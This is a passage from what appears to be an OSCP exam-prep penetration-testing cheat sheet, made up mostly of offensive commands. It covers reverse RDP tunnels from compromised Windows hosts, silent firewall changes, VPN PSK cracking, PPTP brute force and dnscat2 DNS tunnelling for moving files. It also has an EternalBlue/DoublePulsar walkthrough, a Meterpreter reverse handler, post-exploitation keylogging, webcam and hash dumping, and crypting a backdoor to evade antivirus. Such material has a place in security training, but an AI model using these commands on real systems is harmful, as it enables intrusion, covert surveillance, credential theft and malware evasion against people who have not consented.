    • Traffic Encapsulation - Bypassing deep packet inspection

      • http tunnel
        On server side:
        sudo hts -F : 80
         On client side:
        sudo htc -P  -F  :80 stunnel
    • Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network

      • Tunnel on port 22

        plink -l root -pw pass -R 3389::3389 
      • Port 22 blocked? Try port 80? or 443?

        plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389  -P80
    • Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)

      • Windows machine add required firewall rules without prompting the user
      • netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
      • netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
      • netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
      • netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
      • Start the http tunnel client

        httptunnel_client.exe
      • Create HTTP reverse shell by connecting to localhost port 3000

        plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389  -P 3000
    • VLAN Hopping

      • git clone https://github.com/nccgroup/vlan-hopping.git  
        chmod 700 frogger.sh  
        ./frogger.sh

    • VPN Hacking

      • Identify VPN servers:
        ./udp-protocol-scanner.pl -p ike $ip
      • Scan a range for VPN servers:
        ./udp-protocol-scanner.pl -p ike -f ip.txt
      • Use IKEForce to enumerate or dictionary attack VPN servers:

        pip install pyip

        git clone https://github.com/SpiderLabs/ikeforce.git

        Perform IKE VPN enumeration with IKEForce:

        ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

        Bruteforce IKE VPN using IKEForce:

        ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
         Use ike-scan to capture the PSK hash:
        ike-scan  
        ike-scan TARGET-IP  
        ike-scan -A TARGET-IP  
        ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key  
        ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP

        Use psk-crack to crack the PSK hash

        psk-crack hash-file.txt  
        pskcrack  
        psk-crack -b 5 TARGET-IPkey  
        psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key  
        psk-crack -d /path/to/dictionary-file TARGET-IP-key
    • PPTP Hacking

      • Identifying PPTP, it listens on TCP: 1723
        NMAP PPTP Fingerprint:

        nmap –Pn -sV -p 1723 TARGET(S)
         PPTP Dictionary Attack

        thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
    • Port Forwarding/Redirection

    • PuTTY Link tunnel - SSH Tunneling

      • Forward remote port to local address:

        plink.exe -P 22 -l root -pw "1337" -R 445::445 
    • SSH Pivoting

    • DNS Tunneling

      • dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.
      • Attacking Machine Installation:

        apt-get update  
        apt-get -y install ruby-dev git make g++  
        gem install bundler  
        git clone https://github.com/iagox86/dnscat2.git  
        cd dnscat2/server  
        bundle install
      • Run dnscat2:

        ruby ./dnscat2.rb  
        dnscat2> New session established: 1422  
        dnscat2> session -i 1422
        
      • Target Machine:
        https://downloads.skullsecurity.org/dnscat2/

        https://github.com/lukebaggett/dnscat2-powershell/

        dnscat --host 

    The Metasploit Framework

    • See Metasploit Unleashed Course in the Essentials

    • Search for exploits using Metasploit GitHub framework source code:
      https://github.com/rapid7/metasploit-framework
      Translate them for use on OSCP LAB or EXAM.

    • Metasploit

      • MetaSploit requires Postfresql

        systemctl start postgresql
      • To enable Postgresql on startup

        systemctl enable postgresql
    • MSF Syntax

      • Start metasploit

        msfconsole

        msfconsole -q
      • Show help for command

        show -h
      • Show Auxiliary modules

        show auxiliary
      • Use a module

        use auxiliary/scanner/snmp/snmp_enum  
        use auxiliary/scanner/http/webdav_scanner  
        use auxiliary/scanner/smb/smb_version  
        use auxiliary/scanner/ftp/ftp_login  
        use exploit/windows/pop3/seattlelab_pass
        
      • Show the basic information for a module

        info
      • Show the configuration parameters for a module

        show options
      • Set options for a module

        set RHOSTS 192.168.1.1-254  
        set THREADS 10
        
      • Run the module

        run
      • Execute an Exploit

        exploit
      • Search for a module

        search type:auxiliary login
    • Metasploit Database Access

      • Show all hosts discovered in the MSF database

        hosts
      • Scan for hosts and store them in the MSF database

        db_nmap
      • Search machines for specific ports in MSF database

        services -p 443
      • Leverage MSF database to scan SMB ports (auto-completed rhosts)

        services -p 443 --rhosts
    • Staged and Non-staged

      • Non-staged payload - is a payload that is sent in its entirety in one go
      • Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus
    • MS 17-010 - EternalBlue

      • You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: https://www.youtube.com/watch?v=4OHLor9VaRI
      • First step is to configure the Kali to work with wine 32bit

        dpkg --add-architecture i386 && apt-get update && apt-get install wine32 rm -r ~/.wine wine cmd.exe exit

    2.  Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit`
    
    
    1. Move the exploit to /usr/share/metasploit-framework/modules/exploits/windows/smb or ~/.msf4/modules/exploits/windows/smb

    2. Start metasploit console

    • I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.

      use exploit/windows/smb/eternalblue_doublepulsar msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10 RHOST => 10.10.10.10 msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe PROCESSINJECT => spoolsv.exe msf exploit(eternalblue_doublepulsar) > run

    • Experimenting with Meterpreter

    • Get system information from Meterpreter Shell

      sysinfo
    • Get user id from Meterpreter Shell

      getuid
    • Search for a file

      search -f *pass*.txt
    • Upload a file

      upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
    • Download a file

      download c:\\Windows\\system32\\calc.exe /tmp/calc.exe
    • Invoke a command shell from Meterpreter Shell

      shell
    • Exit the meterpreter shell

      exit
  • Metasploit Exploit Multi Handler

    • multi/handler to accept an incoming reversehttpsmeterpreter

      payload  
      use exploit/multi/handler  
      set PAYLOAD windows/meterpreter/reverse_https  
      set LHOST $ip  
      set LPORT 443  
      exploit  
      [*] Started HTTPS reverse handler on https://$ip:443/
      
  • Building Your Own MSF Module

    • mkdir -p ~/.msf4/modules/exploits/linux/misc  
      cd ~/.msf4/modules/exploits/linux/misc  
      cp /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb ./crossfire.rb  
      nano crossfire.rb

  • Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)

    • download
       Download a file or directory
      upload
       Upload a file or directory
      portfwd
       Forward a local port to a remote service
      route
       View and modify the routing table
      keyscan_start
       Start capturing keystrokes
      keyscan_stop
       Stop capturing keystrokes
      screenshot
       Grab a screenshot of the interactive desktop
      record_mic
       Record audio from the default microphone for X seconds
      webcam_snap
       Take a snapshot from the specified webcam
      getsystem
       Attempt to elevate your privilege to that of local system.
      hashdump
       Dumps the contents of the SAM database
  • Meterpreter Post Exploitation Features

    • Create a Meterpreter background session

      background
  • Bypassing Antivirus Software

    • Crypting Known Malware with Software Protectors

      • One such open source crypter, called Hyperion

        cp /usr/share/windows-binaries/Hyperion-1.0.zip  
        unzip Hyperion-1.0.zip  
        cd Hyperion-1.0/  
        i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe  
        cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .  
        cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .  
        wine hyperion.exe ../backdoor.exe ../crypted.exe

    We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.